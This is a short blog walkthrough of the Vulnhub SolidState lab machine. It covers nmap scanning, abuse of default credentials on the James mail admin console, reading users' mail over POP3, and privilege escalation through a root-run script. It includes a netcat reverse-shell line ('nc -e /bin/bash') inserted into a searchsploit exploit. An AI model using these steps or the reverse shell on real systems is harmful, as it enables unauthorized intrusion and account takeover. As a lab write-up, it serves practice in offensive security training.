Vulnhub SolidState Walkthrough

We start al always by running nmap on the host to find open ports and other information:

Nmap –T4 –A –p- 192.168.1.13 –vv

The host running a service called JAMES , on port 4555 is the login where we can login in using the default username and password which is root

Using the help command and then listusers we can see the rest of the users names

After we login we use help to show us a list of commands , we list users by listusers, and then we change everyone’s passwords, after that we login to POP3 service by using Telnet : telnet 192.168.1.13 110 , then we use the command USER mindy, PASS <password> to log in and view the emails, RETR 1 or 2 as she have two emails 1 and 2:

When viewing the second email we find a user name and password for the ssh service

Logging in with the credentials we found :

After that searching searchsploit for james gave us an exploit Remote Command Execution

Just small edit to the script put nc –e /bin/bash 192.168.1.11 444 , as your IP and a listening port

Log out od mindy’s ssh then run the script and login again ,   python -c ‘import pty;pty.spawn(“/bin/bash”)’ and you will be able to run commands

Now let’s see and try to escalate to root privilege

Using ps aux | grep root / ps aux | grep james

We can see that it gave us a path to the opt folder

Going to the opt folder there is a tmp.py file

But it seems that we can’t edit the file so we have to move it to out machine to edit it … we can edit it and make it return a connection back to us or just to view the root.txt file in the root folder

Open a SimpleHTTp connection to our machine and use wget to copy the file back to the host machine in the tmp file, then copy it again to the opt folder and run it , we will find the file in the dev folder, also we need to find world writable folders to copy the file there :

I tried the mqueue folder but didn’t work, so I tried the shm folder and it worked.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s